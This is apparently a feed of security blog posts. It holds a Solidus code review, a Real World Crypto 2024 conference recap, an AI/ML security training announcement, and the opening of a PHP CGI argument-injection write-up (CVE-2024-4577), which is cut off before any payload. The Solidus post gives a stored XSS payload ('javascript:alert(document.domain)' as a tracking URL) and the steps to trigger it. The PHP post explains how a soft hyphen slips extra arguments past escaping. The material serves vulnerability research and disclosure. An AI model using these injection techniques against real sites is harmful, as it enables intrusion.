However, these tools remain interesting because they can give a quick overview of areas to dig.

Identifying a Solidus Website

Before getting into the nitty-gritty of the subject, it may be interesting to identify whether the visited site uses Solidus or not, and for that there are several methods.

On the main shop page, it is possible to search for the following patterns:

<p>Powered by <a href="http://solidus.io/">Solidus</a></p>
/assets/spree/frontend/solidus_starter_frontend

Or check if the following JS functions are available:

Solidus()
SolidusPaypalBraintree

Or finally, visit the administration panel accessible at ‘/admin/login’ and look for one of the following patterns:

<img src="/assets/logo/solidus
<script src="/assets/solidus_admin/
solidus_auth_devise replaces this partial

Unfortunately, no technique seems more reliable than the others, and none of them makes it possible to determine the version of Solidus.
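
Automating these checks is straightforward; a rough sketch using Python’s requests (the patterns are the ones listed above, the helper itself is mine):

import sys
import requests

FRONT_PATTERNS = [
    'Powered by <a href="http://solidus.io/">Solidus</a>',
    "/assets/spree/frontend/solidus_starter_frontend",
]
ADMIN_PATTERNS = [
    '<img src="/assets/logo/solidus',
    '<script src="/assets/solidus_admin/',
    "solidus_auth_devise replaces this partial",
]

def looks_like_solidus(base_url):
    front = requests.get(base_url, timeout=10).text
    admin = requests.get(base_url + "/admin/login", timeout=10).text
    return (any(p in front for p in FRONT_PATTERNS)
            or any(p in admin for p in ADMIN_PATTERNS))

if __name__ == "__main__":
    print(looks_like_solidus(sys.argv[1].rstrip("/")))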

Using website as normal user

In order to get closer to the product, I like to spend time using it as a typical user, and given the number of routes available, I thought I’d spend a little time there. But I was soon disappointed to see that for a classic user, there isn’t much to do outside the purchasing process.

Once the order is placed, user actions are rather limited:

  • See your orders
  • See a specific order (But no PDF or tracking)
  • Update your information (Only email and password)

We will just add that when an order is placed, an email is sent to the user and a new email is sent when the product is shipped.

The administration is also quite limited: apart from the classic actions of an ecommerce site (management of orders, products, stock, etc.), there is only a small amount of configuration that can be done directly from the panel.

For example, it is not possible to configure SMTP; this configuration must be done directly in the Rails project config.

Authentication & Session management

Authentication is a crucial aspect of web application security. It ensures that only authorized individuals have access to the application’s features and sensitive data.

Devise is a popular, highly configurable and robust Ruby on Rails gem for user authentication. This gem provides a complete solution for managing authentication, including account creation, login, logout and password reset.

One reason why Devise is considered a robust solution is its ability to support advanced security features such as email validation, two-factor authentication and session management. Additionally, Devise is regularly updated to fix security vulnerabilities and improve its features.

When I set up my Solidus project, version 4.9.3 of Devise was used, i.e. the latest version available, so I didn’t spend too much time on this part, which immediately seemed to me to be a dead end.

Authorization & Permissions management

Authorization & permissions management is another critical aspect of web application security. It ensures that users only have access to the features and data that they are permitted to access based on their role or permissions.

By default, Solidus has only two roles defined:

  • SuperUser: the administrator, which allows access to all the functionalities
  • DefaultCustomer: the default role assigned during registration, simply allowing you to make purchases on the site

To manage this component, Solidus uses a gem called CanCanCan. Like Devise, CanCanCan is considered a robust solution due to its ability to support complex authorization scenarios, such as hierarchical roles and dynamic permissions. Additionally, CanCanCan is highly configurable.

Furthermore, CanCanCan is highly tested and reliable, making it a safe choice for critical applications. It also has an active community of developers who can provide assistance and advice if needed.

Some Rabbit Holes

1/ Not very interesting Cross-Site Scripting

Finding vulnerabilities is fun, even more so if they are critical, but many articles do not explain that the search takes a lot of time and that many attempts lead to nothing.

Digging into these vulnerabilities, even knowing that they will lead to nothing, is not always meaningless.

Let’s take this Brakeman detection as an example :

Despite the presence of `:target => “_blank”`, which makes the XSS difficult to exploit (except via combinations such as a middle mouse click), I found it interesting to dig into this part of the code and understand how to achieve this injection, simply because it concerns the administration area.

Here’s how this vulnerability could be exploited:

1/ An administrator must modify the shipping methods to add the `javascript:alert(document.domain)` as tracking URL

2/ A user must place an order

3/ An administrator must validate the order and add a tracking number

4/ The tracking URL will therefore correspond to the payload, which can be triggered via a middle mouse click

By default, since the only role capable of this is administrator, the only possibility is that an administrator traps another administrator… in other words, far from interesting.

Note: According to the Solidus documentation, in a non-default configuration it would be possible for a user with fewer privileges to exploit this vulnerability.

Although the impact and exploitation are very low, we have pointed out the weakness to Solidus. Despite several attempts to contact them, we have not received a response. The vulnerability was published as CVE-2024-4859.

2/ Solidus, State Machine & Race Conditions

In an ecommerce site, I find that testing for race conditions is worthwhile because certain features lend themselves to it, such as discount coupons.

But before talking about race conditions, we must understand the concept of a state machine.

A state machine is a behavioral model used in software development to represent the different states that an object or system can be in, as well as the transitions between those states. In the context of a web application, a state machine can be used to model the different states that a user or resource can be in, and the actions that can be performed to transition between those states.

For example, in Solidus, users can place orders. A user can be in one of several states with respect to an order, such as “pending”, “processing”, or “shipped”. The state machine would define these states and the transitions between them, such as “place order” (which transitions from “pending” to “processing”), “cancel order” (which transitions from “processing” back to “pending”), and “ship order” (which transitions from “processing” to “shipped”).
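
As a toy illustration of those transitions (my own sketch, not Solidus code):

TRANSITIONS = {
    ("pending", "place order"): "processing",
    ("processing", "cancel order"): "pending",
    ("processing", "ship order"): "shipped",
}

class Order:
    def __init__(self):
        self.state = "pending"

    def fire(self, event):
        try:
            self.state = TRANSITIONS[(self.state, event)]
        except KeyError:
            raise ValueError(f"invalid transition {event!r} from {self.state!r}")

order = Order()
order.fire("place order")
order.fire("ship order")
print(order.state)  # shipped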

Using a state machine in a web application provides several benefits. First, it helps to ensure that the application is consistent and predictable, since the behavior of the system is clearly defined and enforced. Second, it makes it easier to reason about the application and debug issues, since the state of the system can be easily inspected and understood. Third, it can help to simplify the codebase, since complex logic can be encapsulated within the state machine.

If I mention this, it’s because the Solidus documentation has a chapter dedicated to it, and I think it’s quite rare to see that highlighted!

Now we can try to see if any race conditions are hidden in the use of a promotion code.

Since this section of the code is still in Spree (the ancestor of Solidus), I did not immediately get my hands on it, but in a whitebox audit it is sometimes easier to trace the code back from an error displayed by the site.

In this case, by applying the same promo code twice, the site indicates the error “The coupon code has already been applied to this order”

Then simply look for the error in the entire project code, and trace its use backwards to the method which checks the use of the coupon.

It’s quite difficult to go into detail and explain all the checks, but we can summarize by saying that a coupon is associated with a specific order, and as soon as we try to apply a new coupon, the code checks whether it is already associated with the order.

So to summarize, this code did not seem vulnerable to any race conditions.

Presenting all the tests carried out would be boring, but from reading these lines we understand that the main building blocks of Solidus are rather robust, and that on a default installation I unfortunately could not find much.

So, maybe it is more interesting to focus on custom development, in particular extensions. On Solidus, we can arrange the extensions into three types:

  • Official integrations: listed on the main website; these are mainly payment extensions
  • Community extensions: listed on a dedicated GitHub repository; a varied collection that is more or less well maintained
  • Other extensions: found elsewhere, with no guarantee that they work or are supported

Almost all official extensions integrate with a third party and therefore make requests to that third party, which is what I wanted to avoid here.

Instead, I turned to the community extensions and tested a few that provide functionality I would have liked to have natively on the site, such as PDF invoice export.

For this, I found the Solidus Print Invoice plugin, which has not been maintained for two years. You might think that is a good sign from an attacker’s point of view, except that the plugin is not designed to work with Solidus 4, so the first step was to make it compatible so that it could be installed at all…

As indicated in the documentation, this plugin only adds PDF generation on the admin side.

To cut a long story short, this plugin didn’t give me anything new, and I spent more time installing it than it took to realize I wouldn’t get any vulnerabilities out of it.

I haven’t looked at it, but it’s worth noting that other plugins, such as Solidus Friendly Promotions, replace Solidus core features (according to their documentation) and are therefore inherently more likely to introduce a vulnerability.

Conclusion

Presenting all the tests that could be and were carried out would take far too long. Code analysis really is time-consuming, so it would be false to claim that I have been exhaustive and analyzed the whole application; but after spending a few days on Solidus, I think it’s a very interesting project from a security point of view.

Of course, I’d have liked to be able to detail a few more vulnerabilities, but this blog post goes to show that an audit can’t always be fruitful.


Solidus — Code Review was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Real World Cryptography Conference 2024

This year’s Real World Cryptography Conference recently took place in Toronto, Canada. As usual, this conference organized by the IACR showcased recent academic results and industry perspectives on current cryptography topics over three days of presentations. A number of co-located events also took place before and after the conference, including the FHE.org Conference, the Real World Post-Quantum Cryptography (RWPQC) Workshop and the High Assurance Crypto Software (HACS) Workshop.

A number of NCC Group’s Cryptography Services team members attended the conference and several of the workshops this year. Some of our favorite talks and takeaways are summarized in this post.

Post-Quantum Cryptography

At this year’s Real World Cryptography conference, post-quantum cryptography was strongly represented. With two PQC sessions during the main conference itself, as well as the co-located RWPQC event which took place on the Sunday before the main conference, it was exciting to see so much engagement on the PQC front during our trip to Toronto!

Following the blueprint from last year’s event, the RWPQC workshop opened with an update on the NIST PQC competitions, which reiterated their current status and NIST’s goal of producing the final standards for the FIPS 203 and 204 drafts within the next few months, followed by an initial draft of the Falcon specification under the name FN-DSA. This was followed by updates from other standardization bodies, including ETSI, BSI, NCSC, and the IETF, all of which are working towards providing PQC guidance in their respective areas of influence now that the final FIPS drafts are expected soon. MITRE and the Linux Foundation PQC migration consortiums also gave updates during the workshop. As part of these talks, many standards bodies discussed their approach to the migration and whether or not they plan to mandate the use of hybrid algorithms, with approaches varying from required hybridization to weaker mandates. Additionally, a number of talks noted that while hybrid algorithms may be helpful in the short term, the community should start planning an eventual migration to a single set of algorithms, citing concerns about increased complexity and a combinatorial expansion of algorithm combinations as new algorithms are introduced in the future.

As a counterpart to the presentations by standardization bodies, the RWPQC program included real-world updates about the progress of the PQC migration at various companies, including Signal, Amazon, Google, Meta, and evolutionQ. All talks provided valuable insights into the challenges, both those already overcome and those yet to come, of migrating to PQC in their respective settings. Finally, a few more academic talks on lattice cryptanalysis and implementation footguns rounded off the program. We’ll do a slightly deeper dive into some of our favorite talks!

Lattice Cryptanalysis Talks

Martin Albrecht and John Schanck presented two complementary discussions on topics in lattice cryptanalysis. In the first presentation, Martin Albrecht did a deep dive into the analysis of the current best-known attack on lattice cryptosystems, known as the dual attack, starting with a brief history of the primal and dual attacks and noting some recent works that questioned the accuracy of common heuristics, resulting in improved analyses of these dual algorithms. Martin also observed that there doesn’t seem to be a clear reason why the dual attacks appear to perform better than the primal attacks, remarking that “it seems morally wrong that the dual attack would beat the primal attack”, since it introduces additional transformations over the direct approach. Finally, the presentation concluded with a discussion of recent lattice attacks leveraging machine learning models, with Martin noting that in his opinion there is currently no reason to believe that ML can threaten lattice cryptosystems.

John Schanck’s following talk focused on the “real cost” of the best-known attacks. The NIST security levels I, III and V aim to guide protocol designers to select parameters whose security guarantees match the cost of the best-known attacks against AES-128, 192 and 256 respectively. However, unlike attacks on AES, the dual-lattice attack has an incredibly expensive and memory-hungry sieving step. To make progress on an attack against Kyber and related schemes, one must perform a huge amount of computation before any progress is made on reducing the key space (compare this to attacking AES, where you can simply start guessing keys immediately). The talk featured fun comparisons — a Moon’s weight of silicon would be needed to fabricate enough memory for the naive implementation of the dual attack — and really demonstrated how challenging it is to align the real cost of attacking different cryptographic protocols when the attacks themselves are structured so differently at the algorithmic level. The take-home message from Schanck’s talk was that when memory cost is taken into account, Kyber 768 should be enough for everyone.

Implementation Footguns for Post-Quantum Cryptography

Nadia Heninger presented a very detailed discussion about potential pitfalls she foresees as issues for post-quantum implementations, primarily based on her experiences with implementations of classical cryptography. She noted that many common classes of implementation pitfalls in classical cryptography are still applicable in PQC settings, including RNG issues, issues with sampling or uniformity of distributions (which may be even trickier in the PQC settings, as many lattice schemes require sampling from multiple distributions), API misuse, and missing validation checks, which can be tricky to enforce via tests. This talk resonated with us, as we have already started seeing some of these issues in the post-quantum projects that we have reviewed so far. Finally, her discussion noted that the increased implementation complexity for PQC schemes may be a blessing in disguise, as the more complicated an algorithm seems, the less likely people are to try to implement it themselves, and instead rely on existing implementations, which may end up helping avoid many of these potential issues at scale!

Making Signal Messenger Post Quantum / Making Encrypted Messaging Post Quantum

Rolfe Schmidt gave a fantastic talk on the upgrade to Signal messenger to begin including post-quantum cryptography in the key-agreement stage of the protocol, now known as PQXDH. The talk motivated this change as a protection against “harvest now, decrypt later” attacks, with a design philosophy of changing only what strictly needs to change to achieve protection against a quantum adversary. Although the key agreement now includes a hybridized protocol using post-quantum algorithms, the ratcheting algorithm is still classical-only, so the classical guarantees of the Signal protocol are not yet matched by its post-quantum guarantees. Making the ratchet post-quantum secure is a work in progress for the Signal team, which hopes to do so without affecting messaging performance when Kyber is included in the ratcheting mechanism. The design documentation is now available: PQXDH Specification.

In addition to the design and implementation of PQXDH, Signal collaborated with academia to produce a formally verified implementation of PQXDH using both ProVerif and CryptoVerif. Signal explained that through the process of formally verifying the protocol, they not only gained confidence in the changes, but the verification also highlighted parts of the specification that had been under-described and could have led to attacks if misinterpreted. The process thus not only supported the validity of the design but also serves as a guide to a robust description of PQXDH for developers in the future.

Conclusion

Overall, it’s very exciting to see so much movement in real-world post-quantum applications. We are looking forward to future PQC updates at RWC, RWPQC and elsewhere, and to reviewing PQC projects that come our way!

– Giacomo Pope and Elena Bakos Lang

Key and Certificate Transparency

Key and certificate transparency was a hot topic at this year’s conference. The Levchin Prize was awarded to the team at Google responsible for “creating and deploying Certificate Transparency at scale”. In addition to the public recognition of what that work has pioneered, three talks were scheduled about different aspects of modern transparency solutions.

Invited talk: Key transparency: introduction, recent results, and open problems

The first talk by Melissa Chase from Microsoft Research delved into recent results and open problems in Key Transparency. In modern encrypted messaging deployments, a service provider is generally responsible for distributing users’ public keys. However, what if a man-in-the-middle attacker were to intercept (and meddle with) the public key of the recipient that a sender is trying to establish a secure communication with? Or worse, what if the server were to get compromised? In an end-to-end encrypted messaging setting, key transparency aims to solve this problem of trusted public key distribution which is often glossed over in academic works.

Until recently, the industry solution to the key transparency question was some form of out-of-band verification, in which users can display a fingerprint corresponding to the chat’s encryption key and compare it with one another. Subsequent deployments have made comparing these traditionally long numerical codes easier by displaying a QR code that can be verified when both users are physically close to each other. These solutions can be slightly tedious for users and the industry has started to deploy large-scale and automatic key transparency solutions based on relatively recent academic works such as CONIKS.

In some of these modern key transparency deployments, service providers maintain a publicly accessible key directory which keeps track of users’ public keys. Users can then ensure that the key they hold for a given contact is consistent with the key tracked in the latest version of the online key directory. However, granting people access to public key repositories needs to be done while still maintaining user privacy. Indeed, the deployment of such systems should not make it easier for anyone to track individual users’ actions, for example by figuring out when they refresh their keys (for instance, when they get a new device) or by allowing attackers to find out which users are participating in the system by identifying personal information (such as phone numbers or email addresses) in the key directory.

In order to realize the goals outlined above, key transparency deployments make use of a few interesting cryptographic primitives. Service providers generally publish the key directory together with a commitment to that directory. In practice, this is usually achieved with a Sparse Merkle Tree, and the commitment is the root of that Merkle Tree. In early academic proposals, the server would post a commitment to the current key directory at regular intervals. Newer developments (such as SEEMless) propose that the server publish commitments to the incremental changes to the key directory, lowering the computational effort needed to audit the key transparency tree (since the entire tree does not have to be recomputed and verified). To safeguard the privacy of users, modern key transparency deployments use Verifiable Random Functions (VRFs), which can be thought of as the public-key variant of a hash function. In a VRF, only the private key owner may compute the hash output and its associated proof, but anyone can use the associated public key to verify that the output was calculated correctly. If the leaves of the Merkle tree were computed directly from the identifying information of users, for example by simply hashing some form of identifier, attackers could easily collect information about users. Using a VRF construction conceals that information by essentially randomizing the leaf positions in the Merkle tree. Melissa rounded off the literature-review portion of her talk by presenting OPTIKS, a performant new key transparency solution which focuses on scalability, and which Melissa contributed to.
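To illustrate the basic mechanic, the following sketch commits to a toy key directory with a plain (non-sparse) Merkle tree and verifies an inclusion proof. Real deployments use sparse trees with VRF-derived leaf positions, so this is only the commitment-and-proof skeleton:

# Toy Merkle tree commitment over a key directory, with inclusion proofs.
import hashlib

def h(data):
    return hashlib.sha256(data).digest()

def merkle_root(leaves):
    level = [h(x) for x in leaves]
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])  # pad odd-sized levels
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
    return level[0]

def inclusion_proof(leaves, index):
    proof, level = [], [h(x) for x in leaves]
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])
        proof.append(level[index ^ 1])  # sibling node at this level
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
        index //= 2
    return proof

def verify_inclusion(root, leaf, index, proof):
    node = h(leaf)
    for sibling in proof:
        node = h(node + sibling) if index % 2 == 0 else h(sibling + node)
        index //= 2
    return node == root

directory = [b"alice:pk1", b"bob:pk2", b"carol:pk3"]
root = merkle_root(directory)  # the published commitment
assert verify_inclusion(root, b"bob:pk2", 1, inclusion_proof(directory, 1))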

While many of the technical aspects of key transparency seem to be well ironed-out in theory, there are still a number of open questions and practical aspects that require further engineering efforts. To start, how to effectively instantiate the bulletin board, that publicly accessible key directory that should be efficiently and consistently accessed by users? A second crucial and often overlooked point is that of auditors. One common goal of these key transparency deployments is to provide the ability for auditors to validate the consistency of the key directory. But who are these auditors in practice, and what incentives do they have for performing costly validation work? And if they were to identify any wrongdoing, who would they even report such issues to? A third open question Melissa raised was around the security guarantees of such systems and whether stronger security notions could be obtained. For example, in current schemes, users will detect if a service provider maliciously replaces a user’s key but users themselves can’t prevent it.

WhatsApp Key Transparency

Later that day, Kevin Lewi and Sean Lawlor presented WhatsApp’s key transparency solution. Recent updates to WhatsApp added a feature to automatically validate users’ public keys, based on a key transparency deployment following many of the concepts presented above. Out-of-band verification was already available to chat users, but automatic public key verification is a recent addition. Now, servers publish a commitment to the public key database and, supported by UI updates in the app, the validity of a contact’s key is automatically checked when users access the “Encryption” menu for that contact.

The presentation explored the different technical aspects this deployment necessitated, such as the infrastructure challenges of supporting these updates and the frequency at which they need to be published. The speakers then presented some of the underlying cryptographic constructions used by the deployment. The system uses Sparse Merkle trees and VRFs in a fashion similar to SEEMless, and publishes incremental updates to the key transparency tree in the form of append-only proofs which are roughly 200 MB each and are published at approximately five-minute intervals.

Kevin and Sean concluded their presentation by advertising the release of their implementation of the auditable key directory (accessible at https://github.com/facebook/akd), which is what WhatsApp uses in production for their key transparency deployment and which can also be used to verify the consistency proofs by external auditors. Members of NCC Group’s Cryptography Services team reviewed the implementation a few months before the conference; the public report can be found on NCC’s research platform: Public Report – WhatsApp Auditable Key Directory (AKD) Implementation Review.

Modern transparency logs

Finally, on the last day of the conference, Filippo Valsorda gave a talk on Modern Transparency Logs. Drawing parallels with key transparency solutions, Filippo kicked off his talk by framing transparency logs as a reusable primitive; a magic global append-only list of entries essentially defined by three fundamental questions: what are the entries, who can add them, and who monitors these entries? Different transparency solutions (such as the Go checksum database which Filippo used repeatedly as example throughout his presentation) are ultimately defined by the answers to these questions.

When building transparency log solutions, a fundamental class of attack that must be prevented is presenting different views of the system’s logs to different users, known as a split-view attack. In a key transparency deployment, for example, one could imagine a compromised (or rogue) server advertising a different public key for a target victim. There are a few ways to counter split-view attacks. The first is to ensure local consistency (for example, with an append-only log); the second is peer-to-peer gossip, where peers communicate amongst themselves to ensure they are being served the same view of the system; and the third is witness cosigning. Witnesses are lightweight, third-party entities responsible for verifying consistency proofs between consecutive Merkle tree roots, and which cosign the new tree head. Given a network of witnesses, more complex policies can be developed, such as requiring a threshold of M-out-of-N signers in order for a tree head to be considered validated.
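As a rough illustration of such a threshold policy check (the witness naming and the choice of Ed25519 here are assumptions for illustration, not part of any spec):

# Illustrative M-of-N witness cosignature check over a tree head.
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PublicKey

def policy_satisfied(tree_head, cosignatures, witnesses, m):
    # cosignatures: {witness_name: signature}
    # witnesses: {witness_name: Ed25519PublicKey} -- the N trusted witnesses
    valid = 0
    for name, sig in cosignatures.items():
        key = witnesses.get(name)
        if key is None:
            continue  # signatures from unknown witnesses are ignored
        try:
            key.verify(sig, tree_head)
            valid += 1
        except InvalidSignature:
            pass
    return valid >= m  # require at least M valid cosignatures out of N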

Filippo then proceeded to advertise a number of specifications and work-in-progress items to support modern transparency log deployments. The first is the checkpoint format specification, which is used to interoperate with the witness ecosystem. Checkpoints are essentially signed notes precisely formatted for use in transparency log applications, containing the origin of the checkpoint, the tree size and the root hash, and a number of potential co-signatures on that root hash. Recognizing that a checkpoint coupled with an inclusion proof is everything a client needs to verify inclusion offline, Filippo then introduced the concept of “spicy signatures” (🌶️), which are offline-verifiable proofs of inclusion in a transparency log. He concluded his talk by presenting a lightweight CLI tool and showing how spicy signatures can be used efficiently in existing deployments, for example by bringing transparency to the Debian package ecosystem in only a few hours.

– Paul Bottinelli

Symmetric Encryption

This year’s symmetric encryption session reinforced the motivations for modernizing our security requirements and design philosophy when it comes to symmetric primitives and modes of operation based on lessons learned and changing requirements over the past 20 years.

Building the Next Generation of AEAD

The symmetric cryptography session was opened by Sanketh Menda, who had closed out last year’s event with a presentation on “context-committing” AEADs (authenticated encryption with associated data), acknowledging the need for standardized constructions that commit to the complete “context” of an AEAD (e.g., the key and nonce). In his update this year, “Building the Next Generation of AEAD”, a broader set of goals was presented:

  • We sometimes need a fast approach for lightweight devices;
  • We sometimes need a suitable approach for cloud-scale data;
  • We sometimes need nonce-misuse resistance;
  • We sometimes need a nonce-hiding scheme;
  • And as established last time, we sometimes need context commitment.

And is there one ideal scheme to rule them all? Of course not… However, there may be a new approach to designing a family of schemes that facilitates safer use. To this end, a “flexible AEAD” construction is proposed, which presents an implementer with a single set of binary choices corresponding to various security properties, thereby allowing a developer to express their intent rather than choose and compose various modes of operation. Sanketh then presented a series of primitives that can be composed in standard ways to achieve these various security goals.

With two excellent back-to-back presentations on the topic, I’m hoping we’ll get to hear a progress update from Sanketh again next year.

What’s wrong with Poly1305?

Jan Gilcher and Jérôme Govinden followed up with a presentation looking back on the development and deployment of Poly1305, asking a fundamental question: “Given today’s advancements and applications, would we still converge on this same design?”. This was initially motivated by the observation that Poly1305 sacrifices a degree of security in favor of speed on 32-bit platforms, using optimizations in the floating-point unit, whereas most modern platforms are 64-bit and leverage the arithmetic logic unit for optimized Poly1305 computations. So how would we build and optimize a Poly1305-like construction on today’s hardware?
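For orientation, the core of such a polynomial hash is tiny. Here is a toy sketch of the evaluation at the heart of Poly1305, omitting the key clamping, block encoding, and final key addition that the real MAC requires:

# Toy polynomial hash: evaluate the message as a polynomial in r modulo a prime.
P = (1 << 130) - 5  # the prime behind Poly1305

def poly_hash(blocks, r):
    # blocks: message chunks already encoded as integers
    # r: the secret evaluation point (clamped in the real construction)
    acc = 0
    for m in blocks:
        acc = (acc + m) * r % P
    return acc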

Much like the preceding talk, the authors consider a modular construction for a family of polynomial-based hashes, from which Poly1305 and other similar schemes can be implemented based on a set of input parameters. This allows for the efficient testing and comparison of a broad family of implementations which can be tweaked between favoring security level and speed on a given platform. While such an approach does not outperform a hand-optimized implementation of a specific function, it appears to achieve impressive results based on the flexibility it provides.

Leveraging their new construction, the authors present a variant, Poly1163, which is better optimized for current hardware at a similar security level to Poly1305. Impressively, despite not being hand-optimized at all, this variant outperforms OpenSSL’s Poly1305 implementation. On the other end of the design spectrum, the authors also present Poly1503, which focuses on providing higher bit-security by not clamping inputs in the same manner as Poly1305 without a substantial hit to performance.

I want to encrypt 2^64 bytes with AES-GCM using a single key

Shay Gueron closed out the session with his presentation “I want to encrypt 2^64 bytes with AES-GCM using a single key”, which proposes a new mode of operation for AES called double nonce double key (DNDK), purpose-built to extend AES-GCM to support modern cloud-scale encryption tasks using a single key.

AES-GCM is the most widely used AEAD we encounter and is generally a safe choice for most applications when used correctly. However, GCM has a few well-known limitations: the 12-byte initialization value (IV) limits the number of invocations that can be made with a single key, and GCM out of the box does not provide key commitment, meaning that an attacker can produce a single authenticated ciphertext that decrypts to two different messages under two different nonce+key combinations. It is precisely these two problems that DNDK addresses, while striving to remain as close as possible to the GCM construction itself.

In practice, the concept is simple: if the short IV (nonce) is holding us back, then simply make it bigger, say, double its size. But a “double nonce” isn’t quite enough with GCM, since the first internal step is to hash it down to its original smaller size. Instead, we can use AES itself to build a key derivation function that takes as input the “double nonce” and the encryption key and derives an invocation-specific encryption key. In short, we use our double-nonce-derived key to encrypt our message, and we have DNDK. As a bonus, DNDK supports key commitment out of the box as well, as an optional output parameter. This incurs little practical overhead and does not rely on any additional cryptographic primitives to achieve its security.
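As a sketch of the general pattern only (this is not the DNDK-GCM construction from the draft RFC, and the CMAC-based derivation below is an assumption for illustration), the idea looks roughly like this:

# Illustrative "derive a one-time key from a double nonce" pattern; NOT DNDK-GCM.
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.cmac import CMAC
from cryptography.hazmat.primitives.ciphers import algorithms

def derive_key(root_key, salt):
    mac = CMAC(algorithms.AES(root_key))  # stand-in AES-based KDF (assumption)
    mac.update(salt)
    return mac.finalize()  # 16-byte one-time key

def encrypt(root_key, plaintext, aad=b""):
    double_nonce = os.urandom(24)  # twice the usual 12-byte GCM nonce
    salt, gcm_nonce = double_nonce[:12], double_nonce[12:]
    one_time_key = derive_key(root_key, salt)
    return double_nonce, AESGCM(one_time_key).encrypt(gcm_nonce, plaintext, aad)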

Shay and friends at Meta have provided an optimized open-source implementation of DNDK-GCM, alongside implementations of AES-GCM and AES-GCM-SIV for comparison. A draft RFC has also been published to guide those wishing to implement DNDK for themselves. The Crypto Services team is proud to have supported the development of the DNDK draft RFC, with team members Gérald Doussot, Thomas Pornin, and Eric Schorn being formally acknowledged in the draft RFC.

– Kevin Henry

Real World Cryptography 2025

We look forward to catching up with everyone next year in Sofia, Bulgaria!

Announcing AI/ML safety and security trainings

By Michael D. Brown

We are offering AI/ML safety and security training in summer and fall of this year!

Recent advances in AI/ML technologies have opened up a new world of possibilities for businesses to run more efficiently and offer better services and products. However, incorporating AI/ML into computing systems brings new and unique complexities, risks, and attack surfaces. In our experience helping clients safely and securely deploy these systems, we’ve discovered that their security teams have knowledge gaps at the intersection of AI/ML and systems security. We’ve developed our training to help organizations close this gap and equip their teams with the tools to secure their AI/ML operations pipelines and technology stacks.

What you will learn in our training

Our course is tailored for security engineers, ML engineers, and IT staff who need to understand the unique challenges of securing AI/ML systems deployed on conventional computing infrastructure. Over two days, we provide a comprehensive understanding of AI safety and security that goes beyond basic knowledge to practical and actionable insights into these technologies’ specific dangers and risks. Here’s what you will learn through a blend of instructional training and hands-on case studies:

  1. Fundamentals of AI/ML and cybersecurity: In this module, you will learn how AI/ML models/techniques work, what they can and cannot do, and their limitations. We also cover some essential information and software security topics that may be new for ML engineers.
  2. AI/ML tech stacks and operations pipelines: In our second module, you will learn how AI/ML models are selected, configured, trained, packaged, deployed, and decommissioned. We’ll also explore the everyday technologies in the AI/ML stack that professionals use for these tasks.
  3. Vulnerabilities and remediation: In this module, you will learn about the unique attack surfaces and vulnerabilities present in deployed AI/ML systems. You’ll also learn methods for preventing and/or remediating AI/ML vulnerabilities.
  4. Risk assessment and threat modeling: The fourth module covers practical techniques for conducting comprehensive risk assessments and threat models for AI/ML systems. Our holistic approaches will help you evaluate the safety and security risks AI/ML systems may pose to end users in deployed contexts.
  5. Mitigations, controls, and risk reduction: Finally, you will learn how to implement realistic risk mitigation strategies and practical security controls for AI/ML systems. Our comprehensive strategies address the entire AI/ML ops pipeline and lifecycle.

Equip your team to work at the intersection of security and AI/ML

Trail of Bits combines cutting-edge research with practical, real-world experience to advance the state of the art in AI/ML assurance. Our experts are here to help you confidently take your business to the next level with AI/ML technologies. Please contact us today to schedule an on-site (or virtual) training for your team. Individuals interested in this training can also use this form to be notified in the future when we offer public registration for this course!

No Way, PHP Strikes Again! (CVE-2024-4577)


Orange Tsai tweeted a few hours ago about “One of [his] PHP vulnerabilities, which affects XAMPP by default”, and we were curious to say the least. XAMPP is a very popular way for administrators and developers to rapidly deploy Apache, PHP, and a bunch of other tools, and any bug that could give us RCE in its default installation sounds pretty tantalizing.

Fortunately, for defenders, the bug has only been exploited on Windows-based PHP installations (where PHP is specifically used in CGI mode), under some specific locales:

  • Chinese (both simplified and traditional), and
  • Japanese.

However, Orange cautions that other locales could be affected too, and urges users to upgrade to the latest version of PHP, which fixes these bugs (for detail, see their blogpost).

We are keen to point out that we are unsure how common this configuration, or deployment type, is in reality. It is also not our job to find out, outside of our client base. But, regardless, it's an interesting vulnerability due to the root cause. Enjoy with us.

Orange's blogpost, while informative, doesn’t tell us exactly what to do to get that sweet RCE. Unfortunately, the wide range of configuration options makes it difficult to conclusively prove an instance to be vulnerable (or not) at a passive glance, not least because a Windows machine's 'locale' is not typically externally fingerprintable. Because of this, we set about reproducing the bug—if we can exploit it, that’s the best way of proving exploitability, right?

Reading Orange's blog, it is clear that the bug only affects the CGI mode of PHP. In this mode, the webserver parses HTTP requests and passes them to a PHP script, which then performs some processing on them. For example, querystrings are parsed and passed to the PHP interpreter on the command line - a request such as http://host/cgi.php?foo=bar might be executed as php.exe cgi.php foo=bar.

This does, of course, introduce an avenue for command injection, which is why input is carefully handled and sanitized before calling php.exe (cough CVE-2012-1823). However, it seems there is a corner-case which the developers did not account for, which allows an attacker to break out of the command line and supply arguments that are interpreted by PHP itself. This corner-case relates to how unicode characters are converted into ASCII. This is best explained with an example.

Here are two invocations of php.exe, one malicious and one benign. Can you spot the difference?

[Image: the two php.exe invocations, side by side]

No, neither can I. Let’s look at them in a hex editor and see if that gives us any clues.

[Image: hex editor view of the two invocations]

Hmm, interesting - here we can see that the first invocation uses a normal dash (0x2D), while the second, it seems, uses something else entirely (a ‘soft hyphen,’ apparently), with the code 0xAD (highlighted). While they both appear the same to you and me, they have vastly different meanings to the OS.

An important detail here is that Apache will escape the actual hyphen - 0x2D - but not the second ‘soft hyphen’, 0xAD. After all, it’s not a real hyphen, right? So there’s no need to escape it… right?

[Image: meme]
We don't care if it's the same joke as above, it's still funny.

Well. It turns out that, as part of unicode processing, PHP will apply what’s known as a ‘best fit’ mapping, and helpfully assume that, when the user entered a soft hyphen, they actually intended to type a real hyphen, and interpret it as such. Herein lies our vulnerability - if we supply a CGI handler with a soft hyphen (0xAD), the CGI handler won’t feel the need to escape it, and will pass it to PHP. PHP, however, will interpret it as if it were a real hyphen, which allows an attacker to sneak extra command line arguments, which begin with hyphens, into the PHP process.
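To see how close the two command lines really are, here is a quick illustration (plain Python, just to dump the bytes):

# The benign and malicious argument prefixes differ by exactly one byte:
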